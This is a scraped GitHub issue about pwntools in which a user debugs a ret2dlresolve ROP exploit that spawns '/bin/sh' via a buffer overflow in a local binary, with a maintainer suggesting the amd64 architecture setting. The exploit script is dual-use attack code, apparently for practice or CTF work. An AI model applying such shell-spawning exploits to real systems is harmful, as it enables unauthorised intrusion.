We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
get segfault for 64 bit, the 64+context.bytes are 72, and this seems to be the correct offset for the 64bit example.
on 32 bit p.send(fit({76: rop.chain(), 200: dlresolve.payload})) getting still a shell
from pwn import * context.binary = elf = ELF('./main') rop = ROP(elf) dlresolve = Ret2dlresolvePayload(elf, symbol="system", args=["/bin/sh"]) rop.read(0, dlresolve.data_addr) rop.ret2dlresolve(dlresolve) raw_rop = rop.chain() print(rop.dump()) print(64+context.bytes) p = elf.process() p.sendline(fit({64+context.bytes:rop.chain(), 200:dlresolve.payload})) p.interactive()
The text was updated successfully, but these errors were encountered:
Thank you for contributing to pwntools. In order for us to be able to help you, we need more information.
pwn version
Sorry, something went wrong.
Try adding context.arch = 'amd64' at line 3? Pwntools have 32bit and 64bit payloads and 32bit is the default option.
context.arch = 'amd64'
No branches or pull requests
get segfault for 64 bit, the 64+context.bytes are 72, and this seems to be the correct offset for the 64bit example.
on 32 bit
p.send(fit({76: rop.chain(), 200: dlresolve.payload}))
getting still a shell
The text was updated successfully, but these errors were encountered: